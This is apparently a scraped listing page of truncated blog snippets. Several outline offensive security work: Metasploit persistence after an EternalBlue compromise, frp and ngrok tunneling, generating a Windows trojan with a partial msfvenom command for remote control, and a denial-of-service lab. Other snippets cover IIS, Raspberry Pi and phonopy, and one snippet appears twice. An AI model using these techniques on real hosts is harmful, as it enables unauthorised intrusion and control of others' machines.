
OWASP top10(OWASP十大应用安全风险)之A6 安全性错误配置(Security Misconfigurations)
TOP6安全性错误配置(Security Misconfigurations) 从本质上讲,蛮力是尝试许多可能的组合的行为,但是此攻击有多种变体,可以提高成功率。这是最常见的: 未修补的缺陷 默认配置 未使用的页面 未受保护的文件和目录 不...

TOP6安全性错误配置(Security Misconfigurations) 从本质上讲,蛮力是尝试许多可能的组合的行为,但是此攻击有多种变体,可以提高成功率。这是最常见的: 未修补的缺陷 默认配置 未使用的页面 未受保护的文件和目录 不...

一、环境准备 有一台公网服务器(linux、centos、ubuntu)和公网ip 公网服务器与本地kali同时安装frp,重点文件frpc、frpc.ini这两个是客户端配置文件,frps、frps.ini是服务端配置文件 由于笔者是ma...

Metasploit持久化 metsvc persistence 通过上一篇我们使用smb的ms17-010(永恒之蓝)获得了操作权限,这个时候我们需要让下一次连接的时候直接连上,而不是重新再打一次,这个时候我们就需要用到持久化了 mets...

OWASP靶机下载安装详细过程 一、 OWASP靶机下载 二、 VM虚拟机 三、 OWASP安装 四、 OWASP启动运行 一、 OWASP靶机下载 下载地址:https://www.geek-share.com/image_service...

最近在数据库的学习中使用到了IIS的安装与配置,其过程让人有点懵,在这里记下一个小笔记,也许未来的某一天可能会需要到。IIS是Internet Information Services的缩写,意为互联网信息服务。首先,打开控制面板(可以在此...

Apperently the Linux distro on Raspberry Pi doesn\’t support setting up wifi access point with WPA-EAP encryption ...

1. Installation of phonopy ubuntu12.04 + python3.5.0 (1) some pack sudo apt-get install python2.7-dev python-...

0. 写在前面: 一两个月前偶然得到一个树莓派一代,发现还是挺强大的,然后就考虑着自己实现一个四驱小车。因为本身是学软件的,所以利用软件来控制实实在在可见的硬件一直是自己的一个梦想。所以当时也是花了很多时间来琢磨、实验小车控制方面的东西。因...

一、msf生成木马,联合Sunny-Ngrok进行内网穿透,远程控制外网主机 1.链接隧道 ./sunny clientid 隧道id 2.生成木马 msfvenom -a x64 --platform Windows -p windows...

Metasploit攻击winserver2008实例 一、实验目的 1)了解拒绝服务攻击的原理及其危害2)了解SMB协议及其漏洞信息3)使用Metasploit对win2008系统进行拒绝服务攻击 二、实验环境 漏洞主机:win serv...